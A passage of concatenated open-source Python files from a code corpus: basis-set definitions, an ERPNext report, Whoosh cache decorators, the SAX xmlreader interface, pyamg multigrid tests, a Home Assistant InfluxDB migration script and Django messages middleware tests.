basisfamily_list.append(basis_7zapa_nr)
# F12 basis sets
basis_cc_pvdz_f12 = BasisFamily('cc-pvdz-f12',zeta=2)
basis_cc_pvtz_f12 = BasisFamily('cc-pvtz-f12',zeta=3)
basis_cc_pvqz_f12 = BasisFamily('cc-pvqz-f12',zeta=4)
# basis_cc_pv5z_f12 = BasisFamily('cc-pV5Z-F12')
# ORCA manual suggests for F12 basis sets Dunning's zeta+1
basis_cc_pvdz_f12.add_jkfit('cc-pvtz-jkfit')
basis_cc_pvtz_f12.add_jkfit('cc-pvqz-jkfit')
basis_cc_pvqz_f12.add_jkfit('cc-pv5z-jkfit')
basis_cc_pvdz_f12.add_rifit('cc-pvtz-ri')
basis_cc_pvtz_f12.add_rifit('cc-pvqz-ri')
basis_cc_pvqz_f12.add_rifit('cc-pv5z-ri')
basisfamily_list.append(basis_cc_pvqz_f12)
basisfamily_list.append(basis_cc_pvtz_f12)
basisfamily_list.append(basis_cc_pvqz_f12)
# basisfamily_list.append(basis_cc_pv5z_f12)
|
gangadhar-kadam/helpdesk-erpnext
|
refs/heads/master
|
erpnext/accounts/report/sales_invoice_trends/sales_invoice_trends.py
|
121
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from erpnext.controllers.trends import get_columns,get_data
def execute(filters=None):
if not filters: filters ={}
data = []
conditions = get_columns(filters, "Sales Invoice")
data = get_data(filters, conditions)
return conditions["columns"], data
|
harshita-gupta/Harvard-FRSEM-Catalog-2016-17
|
refs/heads/master
|
flask/lib/python2.7/site-packages/whoosh/util/cache.py
|
95
|
# Copyright 2007 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
from __future__ import with_statement
import functools, random
from array import array
from heapq import nsmallest
from operator import itemgetter
from threading import Lock
from time import time
from whoosh.compat import iteritems, xrange
try:
from collections import Counter
except ImportError:
class Counter(dict):
def __missing__(self, key):
return 0
def unbound_cache(func):
"""Caching decorator with an unbounded cache size.
"""
cache = {}
@functools.wraps(func)
def caching_wrapper(*args):
try:
return cache[args]
except KeyError:
result = func(*args)
cache[args] = result
return result
return caching_wrapper
def lru_cache(maxsize=100):
"""A simple cache that, when the cache is full, deletes the least recently
used 10% of the cached values.
This function duplicates (more-or-less) the protocol of the
``functools.lru_cache`` decorator in the Python 3.2 standard library.
Arguments to the cached function must be hashable.
View the cache statistics tuple ``(hits, misses, maxsize, currsize)``
with f.cache_info(). Clear the cache and statistics with f.cache_clear().
Access the underlying function with f.__wrapped__.
"""
def decorating_function(user_function):
stats = [0, 0] # Hits, misses
data = {}
lastused = {}
@functools.wraps(user_function)
def wrapper(*args):
try:
result = data[args]
stats[0] += 1 # Hit
except KeyError:
stats[1] += 1 # Miss
if len(data) == maxsize:
for k, _ in nsmallest(maxsize // 10 or 1,
iteritems(lastused),
key=itemgetter(1)):
del data[k]
del lastused[k]
data[args] = user_function(*args)
result = data[args]
finally:
lastused[args] = time()
return result
def cache_info():
return stats[0], stats[1], maxsize, len(data)
def cache_clear():
data.clear()
lastused.clear()
stats[0] = stats[1] = 0
wrapper.cache_info = cache_info
wrapper.cache_clear = cache_clear
return wrapper
return decorating_function
def lfu_cache(maxsize=100):
"""A simple cache that, when the cache is full, deletes the least frequently
used 10% of the cached values.
This function duplicates (more-or-less) the protocol of the
``functools.lru_cache`` decorator in the Python 3.2 standard library.
Arguments to the cached function must be hashable.
View the cache statistics tuple ``(hits, misses, maxsize, currsize)``
with f.cache_info(). Clear the cache and statistics with f.cache_clear().
Access the underlying function with f.__wrapped__.
"""
def decorating_function(user_function):
stats = [0, 0] # Hits, misses
data = {}
usecount = Counter()
@functools.wraps(user_function)
def wrapper(*args):
try:
result = data[args]
stats[0] += 1 # Hit
except KeyError:
stats[1] += 1 # Miss
if len(data) == maxsize:
for k, _ in nsmallest(maxsize // 10 or 1,
iteritems(usecount),
key=itemgetter(1)):
del data[k]
del usecount[k]
data[args] = user_function(*args)
result = data[args]
finally:
usecount[args] += 1
return result
def cache_info():
return stats[0], stats[1], maxsize, len(data)
def cache_clear():
data.clear()
usecount.clear()
wrapper.cache_info = cache_info
wrapper.cache_clear = cache_clear
return wrapper
return decorating_function
def random_cache(maxsize=100):
"""A very simple cache that, when the cache is filled, deletes 10% of the
cached values AT RANDOM.
This function duplicates (more-or-less) the protocol of the
``functools.lru_cache`` decorator in the Python 3.2 standard library.
Arguments to the cached function must be hashable.
View the cache statistics tuple ``(hits, misses, maxsize, currsize)``
with f.cache_info(). Clear the cache and statistics with f.cache_clear().
Access the underlying function with f.__wrapped__.
"""
def decorating_function(user_function):
stats = [0, 0] # hits, misses
data = {}
@functools.wraps(user_function)
def wrapper(*args):
try:
result = data[args]
stats[0] += 1 # Hit
except KeyError:
stats[1] += 1 # Miss
if len(data) == maxsize:
keys = data.keys()
for i in xrange(maxsize // 10 or 1):
n = random.randint(0, len(keys) - 1)
k = keys.pop(n)
del data[k]
data[args] = user_function(*args)
result = data[args]
return result
def cache_info():
return stats[0], stats[1], maxsize, len(data)
def cache_clear():
data.clear()
wrapper.cache_info = cache_info
wrapper.cache_clear = cache_clear
return wrapper
return decorating_function
def db_lru_cache(maxsize=100):
"""Double-barrel least-recently-used cache decorator. This is a simple
LRU algorithm that keeps a primary and secondary dict. Keys are checked
in the primary dict, and then the secondary. Once the primary dict fills
up, the secondary dict is cleared and the two dicts are swapped.
This function duplicates (more-or-less) the protocol of the
``functools.lru_cache`` decorator in the Python 3.2 standard library.
Arguments to the cached function must be hashable.
View the cache statistics tuple ``(hits, misses, maxsize, currsize)``
with f.cache_info(). Clear the cache and statistics with f.cache_clear().
Access the underlying function with f.__wrapped__.
"""
def decorating_function(user_function):
# Cache1, Cache2, Pointer, Hits, Misses
stats = [{}, {}, 0, 0, 0]
@functools.wraps(user_function)
def wrapper(*args):
ptr = stats[2]
a = stats[ptr]
b = stats[not ptr]
key = args
if key in a:
stats[3] += 1 # Hit
return a[key]
elif key in b:
stats[3] += 1 # Hit
return b[key]
else:
stats[4] += 1 # Miss
result = user_function(*args)
a[key] = result
if len(a) >= maxsize:
stats[2] = not ptr
b.clear()
return result
def cache_info():
return stats[3], stats[4], maxsize, len(stats[0]) + len(stats[1])
def cache_clear():
"""Clear the cache and cache statistics"""
stats[0].clear()
stats[1].clear()
stats[3] = stats[4] = 0
wrapper.cache_info = cache_info
wrapper.cache_clear = cache_clear
return wrapper
return decorating_function
def clockface_lru_cache(maxsize=100):
"""Least-recently-used cache decorator.
This function duplicates (more-or-less) the protocol of the
``functools.lru_cache`` decorator in the Python 3.2 standard library, but
uses the clock face LRU algorithm instead of an ordered dictionary.
If *maxsize* is set to None, the LRU features are disabled and the cache
can grow without bound.
Arguments to the cached function must be hashable.
View the cache statistics named tuple (hits, misses, maxsize, currsize)
with f.cache_info(). Clear the cache and statistics with f.cache_clear().
Access the underlying function with f.__wrapped__.
"""
def decorating_function(user_function):
stats = [0, 0, 0] # hits, misses, hand
data = {}
if maxsize:
# The keys at each point on the clock face
clock_keys = [None] * maxsize
# The "referenced" bits at each point on the clock face
clock_refs = array("B", (0 for _ in xrange(maxsize)))
lock = Lock()
@functools.wraps(user_function)
def wrapper(*args):
key = args
try:
with lock:
pos, result = data[key]
# The key is in the cache. Set the key's reference bit
clock_refs[pos] = 1
# Record a cache hit
stats[0] += 1
except KeyError:
# Compute the value
result = user_function(*args)
with lock:
# Current position of the clock hand
hand = stats[2]
# Remember to stop here after a full revolution
end = hand
# Sweep around the clock looking for a position with
# the reference bit off
while True:
hand = (hand + 1) % maxsize
current_ref = clock_refs[hand]
if current_ref:
# This position's "referenced" bit is set. Turn
# the bit off and move on.
clock_refs[hand] = 0
elif not current_ref or hand == end:
# We've either found a position with the
# "reference" bit off or reached the end of the
# circular cache. So we'll replace this
# position with the new key
current_key = clock_keys[hand]
if current_key in data:
del data[current_key]
clock_keys[hand] = key
clock_refs[hand] = 1
break
# Put the key and result in the cache
data[key] = (hand, result)
# Save the new hand position
stats[2] = hand
# Record a cache miss
stats[1] += 1
return result
else:
@functools.wraps(user_function)
def wrapper(*args):
key = args
try:
result = data[key]
stats[0] += 1
except KeyError:
result = user_function(*args)
data[key] = result
stats[1] += 1
return result
def cache_info():
return stats[0], stats[1], maxsize, len(data)
def cache_clear():
"""Clear the cache and cache statistics"""
data.clear()
stats[0] = stats[1] = stats[2] = 0
for i in xrange(maxsize):
clock_keys[i] = None
clock_refs[i] = 0
wrapper.cache_info = cache_info
wrapper.cache_clear = cache_clear
return wrapper
return decorating_function
|
vlachoudis/sl4a
|
refs/heads/master
|
python/src/Lib/xml/sax/xmlreader.py
|
60
|
"""An XML Reader is the SAX 2 name for an XML parser. XML Parsers
should be based on this code. """
import handler
from _exceptions import SAXNotSupportedException, SAXNotRecognizedException
# ===== XMLREADER =====
class XMLReader:
"""Interface for reading an XML document using callbacks.
XMLReader is the interface that an XML parser's SAX2 driver must
implement. This interface allows an application to set and query
features and properties in the parser, to register event handlers
for document processing, and to initiate a document parse.
All SAX interfaces are assumed to be synchronous: the parse
methods must not return until parsing is complete, and readers
must wait for an event-handler callback to return before reporting
the next event."""
def __init__(self):
self._cont_handler = handler.ContentHandler()
self._dtd_handler = handler.DTDHandler()
self._ent_handler = handler.EntityResolver()
self._err_handler = handler.ErrorHandler()
def parse(self, source):
"Parse an XML document from a system identifier or an InputSource."
raise NotImplementedError("This method must be implemented!")
def getContentHandler(self):
"Returns the current ContentHandler."
return self._cont_handler
def setContentHandler(self, handler):
"Registers a new object to receive document content events."
self._cont_handler = handler
def getDTDHandler(self):
"Returns the current DTD handler."
return self._dtd_handler
def setDTDHandler(self, handler):
"Register an object to receive basic DTD-related events."
self._dtd_handler = handler
def getEntityResolver(self):
"Returns the current EntityResolver."
return self._ent_handler
def setEntityResolver(self, resolver):
"Register an object to resolve external entities."
self._ent_handler = resolver
def getErrorHandler(self):
"Returns the current ErrorHandler."
return self._err_handler
def setErrorHandler(self, handler):
"Register an object to receive error-message events."
self._err_handler = handler
def setLocale(self, locale):
"""Allow an application to set the locale for errors and warnings.
SAX parsers are not required to provide localization for errors
and warnings; if they cannot support the requested locale,
however, they must throw a SAX exception. Applications may
request a locale change in the middle of a parse."""
raise SAXNotSupportedException("Locale support not implemented")
def getFeature(self, name):
"Looks up and returns the state of a SAX2 feature."
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def setFeature(self, name, state):
"Sets the state of a SAX2 feature."
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def getProperty(self, name):
"Looks up and returns the value of a SAX2 property."
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
def setProperty(self, name, value):
"Sets the value of a SAX2 property."
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
class IncrementalParser(XMLReader):
"""This interface adds three extra methods to the XMLReader
interface that allow XML parsers to support incremental
parsing. Support for this interface is optional, since not all
underlying XML parsers support this functionality.
When the parser is instantiated it is ready to begin accepting
data from the feed method immediately. After parsing has been
finished with a call to close the reset method must be called to
make the parser ready to accept new data, either from feed or
using the parse method.
Note that these methods must _not_ be called during parsing, that
is, after parse has been called and before it returns.
By default, the class also implements the parse method of the XMLReader
interface using the feed, close and reset methods of the
IncrementalParser interface as a convenience to SAX 2.0 driver
writers."""
def __init__(self, bufsize=2**16):
self._bufsize = bufsize
XMLReader.__init__(self)
def parse(self, source):
import saxutils
source = saxutils.prepare_input_source(source)
self.prepareParser(source)
file = source.getByteStream()
buffer = file.read(self._bufsize)
while buffer != "":
self.feed(buffer)
buffer = file.read(self._bufsize)
self.close()
def feed(self, data):
"""This method gives the raw XML data in the data parameter to
the parser and makes it parse the data, emitting the
corresponding events. It is allowed for XML constructs to be
split across several calls to feed.
feed may raise SAXException."""
raise NotImplementedError("This method must be implemented!")
def prepareParser(self, source):
"""This method is called by the parse implementation to allow
the SAX 2.0 driver to prepare itself for parsing."""
raise NotImplementedError("prepareParser must be overridden!")
def close(self):
"""This method is called when the entire XML document has been
passed to the parser through the feed method, to notify the
parser that there are no more data. This allows the parser to
do the final checks on the document and empty the internal
data buffer.
The parser will not be ready to parse another document until
the reset method has been called.
close may raise SAXException."""
raise NotImplementedError("This method must be implemented!")
def reset(self):
"""This method is called after close has been called to reset
the parser so that it is ready to parse new documents. The
results of calling parse or feed after close without calling
reset are undefined."""
raise NotImplementedError("This method must be implemented!")
# ===== LOCATOR =====
class Locator:
"""Interface for associating a SAX event with a document
location. A locator object will return valid results only during
calls to DocumentHandler methods; at any other time, the
results are unpredictable."""
def getColumnNumber(self):
"Return the column number where the current event ends."
return -1
def getLineNumber(self):
"Return the line number where the current event ends."
return -1
def getPublicId(self):
"Return the public identifier for the current event."
return None
def getSystemId(self):
"Return the system identifier for the current event."
return None
# ===== INPUTSOURCE =====
class InputSource:
"""Encapsulation of the information needed by the XMLReader to
read entities.
This class may include information about the public identifier,
system identifier, byte stream (possibly with character encoding
information) and/or the character stream of an entity.
Applications will create objects of this class for use in the
XMLReader.parse method and for returning from
EntityResolver.resolveEntity.
An InputSource belongs to the application, the XMLReader is not
allowed to modify InputSource objects passed to it from the
application, although it may make copies and modify those."""
def __init__(self, system_id = None):
self.__system_id = system_id
self.__public_id = None
self.__encoding = None
self.__bytefile = None
self.__charfile = None
def setPublicId(self, public_id):
"Sets the public identifier of this InputSource."
self.__public_id = public_id
def getPublicId(self):
"Returns the public identifier of this InputSource."
return self.__public_id
def setSystemId(self, system_id):
"Sets the system identifier of this InputSource."
self.__system_id = system_id
def getSystemId(self):
"Returns the system identifier of this InputSource."
return self.__system_id
def setEncoding(self, encoding):
"""Sets the character encoding of this InputSource.
The encoding must be a string acceptable for an XML encoding
declaration (see section 4.3.3 of the XML recommendation).
The encoding attribute of the InputSource is ignored if the
InputSource also contains a character stream."""
self.__encoding = encoding
def getEncoding(self):
"Get the character encoding of this InputSource."
return self.__encoding
def setByteStream(self, bytefile):
"""Set the byte stream (a Python file-like object which does
not perform byte-to-character conversion) for this input
source.
The SAX parser will ignore this if there is also a character
stream specified, but it will use a byte stream in preference
to opening a URI connection itself.
If the application knows the character encoding of the byte
stream, it should set it with the setEncoding method."""
self.__bytefile = bytefile
def getByteStream(self):
"""Get the byte stream for this input source.
The getEncoding method will return the character encoding for
this byte stream, or None if unknown."""
return self.__bytefile
def setCharacterStream(self, charfile):
"""Set the character stream for this input source. (The stream
must be a Python 2.0 Unicode-wrapped file-like that performs
conversion to Unicode strings.)
If there is a character stream specified, the SAX parser will
ignore any byte stream and will not attempt to open a URI
connection to the system identifier."""
self.__charfile = charfile
def getCharacterStream(self):
"Get the character stream for this input source."
return self.__charfile
# ===== ATTRIBUTESIMPL =====
class AttributesImpl:
def __init__(self, attrs):
"""Non-NS-aware implementation.
attrs should be of the form {name : value}."""
self._attrs = attrs
def getLength(self):
return len(self._attrs)
def getType(self, name):
return "CDATA"
def getValue(self, name):
return self._attrs[name]
def getValueByQName(self, name):
return self._attrs[name]
def getNameByQName(self, name):
if not name in self._attrs:
raise KeyError, name
return name
def getQNameByName(self, name):
if not name in self._attrs:
raise KeyError, name
return name
def getNames(self):
return self._attrs.keys()
def getQNames(self):
return self._attrs.keys()
def __len__(self):
return len(self._attrs)
def __getitem__(self, name):
return self._attrs[name]
def keys(self):
return self._attrs.keys()
def has_key(self, name):
return name in self._attrs
def __contains__(self, name):
return self._attrs.has_key(name)
def get(self, name, alternative=None):
return self._attrs.get(name, alternative)
def copy(self):
return self.__class__(self._attrs)
def items(self):
return self._attrs.items()
def values(self):
return self._attrs.values()
# ===== ATTRIBUTESNSIMPL =====
class AttributesNSImpl(AttributesImpl):
def __init__(self, attrs, qnames):
"""NS-aware implementation.
attrs should be of the form {(ns_uri, lname): value, ...}.
qnames of the form {(ns_uri, lname): qname, ...}."""
self._attrs = attrs
self._qnames = qnames
def getValueByQName(self, name):
for (nsname, qname) in self._qnames.items():
if qname == name:
return self._attrs[nsname]
raise KeyError, name
def getNameByQName(self, name):
for (nsname, qname) in self._qnames.items():
if qname == name:
return nsname
raise KeyError, name
def getQNameByName(self, name):
return self._qnames[name]
def getQNames(self):
return self._qnames.values()
def copy(self):
return self.__class__(self._attrs, self._qnames)
def _test():
XMLReader()
IncrementalParser()
Locator()
if __name__ == "__main__":
_test()
|
pombreda/pyamg
|
refs/heads/master
|
pyamg/classical/tests/test_classical.py
|
1
|
from pyamg.testing import *
import numpy
from numpy import ravel, ones, concatenate, cumsum, zeros
from scipy import rand
from scipy.sparse import csr_matrix, lil_matrix, coo_matrix
from pyamg.gallery import poisson, load_example
from pyamg.strength import classical_strength_of_connection
from pyamg.classical import split
from pyamg.classical.classical import ruge_stuben_solver
from pyamg.classical.interpolate import direct_interpolation
class TestRugeStubenFunctions(TestCase):
def setUp(self):
self.cases = []
# random matrices
numpy.random.seed(0)
for N in [2,3,5]:
self.cases.append( csr_matrix(rand(N,N)) )
# Poisson problems in 1D and 2D
for N in [2,3,5,7,10,11,19]:
self.cases.append( poisson( (N,), format='csr') )
for N in [2,3,5,7,10,11]:
self.cases.append( poisson( (N,N), format='csr') )
for name in ['knot','airfoil','bar']:
ex = load_example(name)
self.cases.append( ex['A'].tocsr() )
def test_RS_splitting(self):
for A in self.cases:
S = classical_strength_of_connection(A, 0.0)
splitting = split.RS( S )
assert( splitting.min() >= 0 ) #could be all 1s
assert_equal( splitting.max(), 1 )
S.data[:] = 1
# check that all F-nodes are strongly connected to a C-node
assert( (splitting + S*splitting).min() > 0 )
### THIS IS NOT STRICTLY ENFORCED!
## check that all strong connections S[i,j] satisfy either:
## (0) i is a C-node
## (1) j is a C-node
## (2) k is a C-node and both i and j are are strongly connected to k
#
#X = S.tocoo()
## remove C->F edges (i.e. S[i,j] where (0) holds )
#mask = splitting[X.row] == 0
#X.row = X.row[mask]
#X.col = X.col[mask]
#X.data = X.data[mask]
## remove F->C edges (i.e. S[i,j] where (1) holds )
#mask = splitting[X.col] == 0
#X.row = X.row[mask]
#X.col = X.col[mask]
#X.data = X.data[mask]
## X now consists of strong F->F edges only
#
## (S * S.T)[i,j] is the # of C nodes on which both i and j
## strongly depend (i.e. the number of k's where (2) holds)
#Y = (S*S.T) - X
#assert( Y.nnz == 0 or Y.data.min() > 0 )
def test_cljp_splitting(self):
for A in self.cases:
S = classical_strength_of_connection(A, 0.0)
splitting = split.CLJP( S )
assert( splitting.min() >= 0 ) #could be all 1s
assert_equal( splitting.max(), 1 )
S.data[:] = 1
# check that all F-nodes are strongly connected to a C-node
assert( (splitting + S*splitting).min() > 0 )
def test_cljpc_splitting(self):
for A in self.cases:
S = classical_strength_of_connection(A, 0.0)
splitting = split.CLJPc( S )
assert( splitting.min() >= 0 ) #could be all 1s
assert_equal( splitting.max(), 1 )
S.data[:] = 1
# check that all F-nodes are strongly connected to a C-node
assert( (splitting + S*splitting).min() > 0 )
def test_direct_interpolation(self):
for A in self.cases:
S = classical_strength_of_connection(A, 0.0)
splitting = split.RS( S )
result = direct_interpolation(A,S,splitting)
expected = reference_direct_interpolation( A, S, splitting )
assert_almost_equal( result.todense(), expected.todense() )
class TestSolverPerformance(TestCase):
def test_poisson(self):
cases = []
cases.append( (500,) )
cases.append( (250,250) )
cases.append( (25,25,25) )
for case in cases:
A = poisson( case, format='csr' )
numpy.random.seed(0) #make tests repeatable
x = rand(A.shape[0])
b = A*rand(A.shape[0]) #zeros_like(x)
ml = ruge_stuben_solver(A, max_coarse=50)
residuals = []
x_sol = ml.solve(b, x0=x, maxiter=20, tol=1e-12, residuals=residuals)
avg_convergence_ratio = (residuals[-1]/residuals[0])**(1.0/len(residuals))
assert(avg_convergence_ratio < 0.20)
def test_matrix_formats(self):
# Do dense, csr, bsr and csc versions of A all yield the same solver
A = poisson( (7,7), format='csr')
cases = [ A.tobsr(blocksize=(1,1)) ]
cases.append(A.tocsc())
cases.append(A.todense())
rs_old = ruge_stuben_solver(A,max_coarse=10)
for AA in cases:
rs_new = ruge_stuben_solver(AA,max_coarse=10)
assert( abs( ravel( rs_old.levels[-1].A.todense() -
rs_new.levels[-1].A.todense() )).max() < 0.01 )
rs_old = rs_new
################################################
## reference implementations for unittests ##
################################################
def reference_direct_interpolation(A,S,splitting):
A = coo_matrix(A)
S = coo_matrix(S)
#strong C points
c_mask = splitting[S.col] == 1
C_s = coo_matrix( (S.data[c_mask],(S.row[c_mask],S.col[c_mask])), shape=S.shape)
#strong F points
f_mask = ~c_mask
F_s = coo_matrix( (S.data[f_mask],(S.row[f_mask],S.col[f_mask])), shape=S.shape)
# split A in to + and -
mask = (A.data > 0) & (A.row != A.col)
A_pos = coo_matrix( (A.data[mask],(A.row[mask],A.col[mask])), shape=A.shape)
mask = (A.data < 0) & (A.row != A.col)
A_neg = coo_matrix( (A.data[mask],(A.row[mask],A.col[mask])), shape=A.shape)
# split C_S in to + and -
mask = C_s.data > 0
C_s_pos = coo_matrix( (C_s.data[mask],(C_s.row[mask],C_s.col[mask])), shape=A.shape)
mask = ~mask
C_s_neg = coo_matrix( (C_s.data[mask],(C_s.row[mask],C_s.col[mask])), shape=A.shape)
sum_strong_pos = ravel(C_s_pos.sum(axis=1))
sum_strong_neg = ravel(C_s_neg.sum(axis=1))
sum_all_pos = ravel(A_pos.sum(axis=1))
sum_all_neg = ravel(A_neg.sum(axis=1))
diag = A.diagonal()
mask = (sum_strong_neg != 0.0)
alpha = numpy.zeros_like(sum_all_neg)
alpha[mask] = sum_all_neg[mask] / sum_strong_neg[mask]
mask = (sum_strong_pos != 0.0)
beta = numpy.zeros_like(sum_all_pos)
beta[mask] = sum_all_pos[mask] / sum_strong_pos[mask]
mask = sum_strong_pos == 0
diag[mask] += sum_all_pos[mask]
beta[mask] = 0
C_s_neg.data *= -alpha[C_s_neg.row]/diag[C_s_neg.row]
C_s_pos.data *= -beta[C_s_pos.row]/diag[C_s_pos.row]
C_rows = splitting.nonzero()[0]
C_inject = coo_matrix( (ones(sum(splitting)),(C_rows,C_rows)), shape=A.shape)
P = C_s_neg.tocsr() + C_s_pos.tocsr() + C_inject.tocsr()
map = concatenate(([0],cumsum(splitting)))
P = csr_matrix( (P.data,map[P.indices],P.indptr), shape=(P.shape[0],map[-1]))
return P
|
morphis/home-assistant
|
refs/heads/snap-support
|
homeassistant/scripts/influxdb_migrator.py
|
12
|
"""Script to convert an old-structure influxdb to a new one."""
import argparse
import sys
from typing import List
# Based on code at
# http://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
def print_progress(iteration: int, total: int, prefix: str='', suffix: str='',
decimals: int=2, bar_length: int=68) -> None:
"""Print progress bar.
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : number of decimals in percent complete (Int)
barLength - Optional : character length of bar (Int)
"""
filled_length = int(round(bar_length * iteration / float(total)))
percents = round(100.00 * (iteration / float(total)), decimals)
line = '#' * filled_length + '-' * (bar_length - filled_length)
sys.stdout.write('%s [%s] %s%s %s\r' % (prefix, line,
percents, '%', suffix))
sys.stdout.flush()
if iteration == total:
print("\n")
def run(script_args: List) -> int:
"""The actual script body."""
from influxdb import InfluxDBClient
parser = argparse.ArgumentParser(
description="Migrate legacy influxDB.")
parser.add_argument(
'-d', '--dbname',
metavar='dbname',
required=True,
help="InfluxDB database name")
parser.add_argument(
'-H', '--host',
metavar='host',
default='127.0.0.1',
help="InfluxDB host address")
parser.add_argument(
'-P', '--port',
metavar='port',
default=8086,
help="InfluxDB host port")
parser.add_argument(
'-u', '--username',
metavar='username',
default='root',
help="InfluxDB username")
parser.add_argument(
'-p', '--password',
metavar='password',
default='root',
help="InfluxDB password")
parser.add_argument(
'-s', '--step',
metavar='step',
default=1000,
help="How many points to migrate at the same time")
parser.add_argument(
'-o', '--override-measurement',
metavar='override_measurement',
default="",
help="Store all your points in the same measurement")
parser.add_argument(
'-D', '--delete',
action='store_true',
default=False,
help="Delete old database")
parser.add_argument(
'--script',
choices=['influxdb_migrator'])
args = parser.parse_args()
# Get client for old DB
client = InfluxDBClient(args.host, args.port,
args.username, args.password)
client.switch_database(args.dbname)
# Get DB list
db_list = [db['name'] for db in client.get_list_database()]
# Get measurements of the old DB
res = client.query('SHOW MEASUREMENTS')
measurements = [measurement['name'] for measurement in res.get_points()]
nb_measurements = len(measurements)
# Move data
# Get old DB name
old_dbname = "{}__old".format(args.dbname)
# Create old DB if needed
if old_dbname not in db_list:
client.create_database(old_dbname)
# Copy data to the old DB
print("Cloning from {} to {}".format(args.dbname, old_dbname))
for index, measurement in enumerate(measurements):
client.query('''SELECT * INTO {}..:MEASUREMENT FROM '''
'"{}" GROUP BY *'.format(old_dbname, measurement))
# Print progess
print_progress(index + 1, nb_measurements)
# Delete the database
client.drop_database(args.dbname)
# Create new DB if needed
client.create_database(args.dbname)
client.switch_database(old_dbname)
# Get client for new DB
new_client = InfluxDBClient(args.host, args.port, args.username,
args.password, args.dbname)
# Counter of points without time
point_wt_time = 0
print("Migrating from {} to {}".format(old_dbname, args.dbname))
# Walk into measurenebt
for index, measurement in enumerate(measurements):
# Get tag list
res = client.query('''SHOW TAG KEYS FROM "{}"'''.format(measurement))
tags = [v['tagKey'] for v in res.get_points()]
# Get field list
res = client.query('''SHOW FIELD KEYS FROM "{}"'''.format(measurement))
fields = [v['fieldKey'] for v in res.get_points()]
# Get points, convert and send points to the new DB
offset = 0
while True:
nb_points = 0
# Prepare new points
new_points = []
# Get points
res = client.query('SELECT * FROM "{}" LIMIT {} OFFSET '
'{}'.format(measurement, args.step, offset))
for point in res.get_points():
new_point = {"tags": {},
"fields": {},
"time": None}
if args.override_measurement:
new_point["measurement"] = args.override_measurement
else:
new_point["measurement"] = measurement
# Check time
if point["time"] is None:
# Point without time
point_wt_time += 1
print("Can not convert point without time")
continue
# Convert all fields
for field in fields:
try:
new_point["fields"][field] = float(point[field])
except (ValueError, TypeError):
if field == "value":
new_key = "state"
else:
new_key = "{}_str".format(field)
new_point["fields"][new_key] = str(point[field])
# Add tags
for tag in tags:
new_point["tags"][tag] = point[tag]
# Set time
new_point["time"] = point["time"]
# Add new point to the new list
new_points.append(new_point)
# Count nb points
nb_points += 1
# Send to the new db
try:
new_client.write_points(new_points)
except Exception as exp:
raise exp
# If there is no points
if nb_points == 0:
# print("Measurement {} migrated".format(measurement))
break
else:
# Increment offset
offset += args.step
# Print progess
print_progress(index + 1, nb_measurements)
# Delete database if needed
if args.delete:
print("Dropping {}".format(old_dbname))
client.drop_database(old_dbname)
|
oogles/djem
|
refs/heads/master
|
djem/tests/test_middleware.py
|
2
|
from __future__ import unicode_literals
from django.conf.urls import url
from django.contrib import messages
from django.contrib.messages import constants
from django.http import HttpRequest, HttpResponse
from django.test import Client, TestCase, override_settings
from djem.middleware import MemoryStorage
def add_message_view(request):
msg = request.GET['msg']
messages.info(request, msg)
if request.is_ajax():
prefix = 'AJAX'
else:
prefix = 'STANDARD'
return HttpResponse('{0}: no messages'.format(prefix))
def add_read_message_view(request):
msg = request.GET['msg']
messages.info(request, msg)
content = ', '.join([msg.message for msg in messages.get_messages(request)])
if request.is_ajax():
prefix = 'AJAX'
else:
prefix = 'STANDARD'
return HttpResponse('{0}: {1}'.format(prefix, content))
urlpatterns = [
url(r'^messages/add/$', add_message_view),
url(r'^messages/add/read/$', add_read_message_view),
]
djem_middleware_settings = override_settings(
ROOT_URLCONF='djem.tests.test_middleware',
MIDDLEWARE=[
'django.contrib.sessions.middleware.SessionMiddleware',
'djem.middleware.MessageMiddleware'
]
)
django_middleware_settings = override_settings(
ROOT_URLCONF='djem.tests.test_middleware',
MIDDLEWARE=[
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.messages.middleware.MessageMiddleware'
]
)
class MemoryStorageTestCase(TestCase):
def test_add(self):
"""
Test messages can be added and retrieved as expected.
"""
# Create a message store with a fake request instance
messages = MemoryStorage(HttpRequest())
self.assertEqual(len(messages), 0)
messages.add(constants.INFO, 'Test message')
self.assertEqual(len(messages), 1)
messages.add(constants.INFO, 'Another test message')
self.assertEqual(len(messages), 2)
# Read the message store
message_list = list(messages)
messages.add(constants.INFO, 'A third test message')
self.assertEqual(len(message_list), 2)
self.assertEqual(len(messages), 3)
class MessageMiddlewareTestCase(TestCase):
def setUp(self):
